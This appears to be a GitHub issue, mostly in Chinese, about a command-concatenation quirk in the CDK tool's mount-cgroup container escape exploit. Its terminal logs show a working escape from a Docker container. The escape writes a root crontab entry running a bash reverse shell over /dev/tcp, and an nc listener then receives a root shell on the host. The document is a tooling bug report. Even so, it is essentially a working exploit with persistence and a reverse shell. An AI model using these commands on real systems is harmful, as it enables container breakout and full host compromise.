mount-cgroup执行命令时的拼接问题处置

[F14Sec]

root@79a270635491:/# ./cdk run mount-cgroup "echo \"* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'\" >> /etc/crontab"
2023/10/17 04:25:59 current cgroup for exploit: memory 
2023/10/17 04:25:59 user-defined shell payload is: echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab 
2023/10/17 04:25:59 Found hostpath: /var/lib/docker/overlay2/37263eea1b159b6a86395fe44a9ede856a2f8c055f309244d2d16d7619f2541d/diff
2023/10/17 04:25:59 generate shell exploit with user-input cmd: 

echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab

final shell exploit is: 

#!/bin/sh
echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab > /var/lib/docker/overlay2/37263eea1b159b6a86395fe44a9ede856a2f8c055f309244d2d16d7619f2541d/diff/cdk_cgres_St8G

2023/10/17 04:25:59 shell script saved to /cdk_cgexp_St8G.sh
2023/10/17 04:26:04 Execute Result: 

 * * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'
 
root@79a270635491:/#
root@79a270635491:/# 
root@79a270635491:/# 
root@79a270635491:/# ./cdk run mount-cgroup "echo \"* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'\" >> /etc/crontab; echo hello"
2023/10/17 04:28:43 current cgroup for exploit: memory 
2023/10/17 04:28:43 user-defined shell payload is: echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab; echo hello 
2023/10/17 04:28:43 Found hostpath: /var/lib/docker/overlay2/37263eea1b159b6a86395fe44a9ede856a2f8c055f309244d2d16d7619f2541d/diff
2023/10/17 04:28:43 generate shell exploit with user-input cmd: 

echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab; echo hello

final shell exploit is: 

#!/bin/sh
echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab; echo hello > /var/lib/docker/overlay2/37263eea1b159b6a86395fe44a9ede856a2f8c055f309244d2d16d7619f2541d/diff/cdk_cgres_ieFr

2023/10/17 04:28:43 shell script saved to /cdk_cgexp_ieFr.sh
2023/10/17 04:28:48 Execute Result: 

 hello
 
root@79a270635491:/#

ubuntu@VM-0-2-ubuntu:~$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'
ubuntu@VM-0-2-ubuntu:~$ 
ubuntu@VM-0-2-ubuntu:~$ nc -lvnp 22334
Listening on 0.0.0.0 22334
Connection received on 127.0.0.1 43058
bash: cannot set terminal process group (29740): Inappropriate ioctl for device
bash: no job control in this shell
root@VM-0-2-ubuntu:~#

[neargle]

“拼接问题”指的是什么问题呢？